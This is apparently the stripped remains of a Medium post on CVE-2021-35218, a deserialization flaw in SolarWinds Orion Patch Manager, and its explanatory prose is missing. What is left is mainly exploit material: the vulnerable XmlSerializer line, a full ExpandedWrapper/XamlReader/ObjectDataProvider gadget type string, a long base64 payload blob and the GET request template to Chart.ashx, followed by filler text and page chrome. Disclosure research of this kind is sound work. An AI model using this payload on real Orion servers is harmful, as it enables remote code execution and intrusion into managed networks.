50 Shades of SolarWinds Orion (Patch Manager) Deserialization (Final Part: CVE-2021–35218)

XmlSerializer xmlSerializer = new XmlSerializer(Type.GetType(context.Request.QueryString["tp"]));
tp=System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
dlZSTmI5UXdFTDN6SzRMdmpiY2djVEJKcW9ydEFVR2g2cTVFcGFvSHg1N2ROWXJ0eUdPYVJJai96bXoySXlrYlBub2hKMmZldlBIenpMT3ppOVpXeVNNRU5ON2w3RHlkc1l2aVJVSmZkdFhXMG1uUVg0S3Nhd2lmVjNmU1ZyY2dOYTNMcjZEaVhFWjVFL3lqb1VoQ1pSeUtGazNPTmpIV2d2T21hZExtZGVyRG1yK2F6Yzc1M2ZYSGhkcUFsV2ZHWVpST0FUdXk5TjlaTE5ucGVxTHRxZ0lMTHZJUlJJcTI0a0RUZ21USGJqYUFmY0kxeEkzWG42U0Y0a1lHaEl5UElsT3BsRVZRcEI0OWhmc1U2YnBsVjhQL09EOFZGNUgyeWhrUkJNWmczSnFkU3VwbHZieC9ONzljWHQ1bnQ0RCtXMUF3TnlyU2lHWG9kcHNlTjhTK09xYldxT0RScjJLcXZPV05jYXQycStBTmIybnN2QTZBMUdpNXJYR1FyWjlYNDBBcmM2YXFjT2FvcDFoTEJXTFJZUVQ3VmlLQ0xhc3V0Nmg4cUV4NUlLaHBRam8zY3UwOFJxTndJR09Qc1NLYjhLZ1dINkRMR1V0MjJMTHY1WGN0K2dFcVFYa0tFSCt3WkRCRXpoWlJoamhaTHoyeFIxYUtSVCtXUWxtZDhlUGZFT2NxVWJKU0tiUXd4dmsvVlovSW91RHBoSXVIaHdtbjhyMVZmL0U0LzdQSjkrZCt2N2ZzeUlURGM4Q08wZzVwby92SWYzY2hNLzZzRjZiNENRPT01
GET /orion/PM/Chart.ashx/Skipi18n?tp=<type>&chart=<serialized data> HTTP/1.1

--

--

--

asdasd asdasdasd asdasdasd

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jang

Jang

asdasd asdasdasd asdasdasd

More from Medium

Root The Box — ITSafe (Walkthrough)

CoAP Protocol: Definition, Architecture 📌

Terms of (Mis)Use

Strapi Issue “Error while running command develop: Could not load js config file…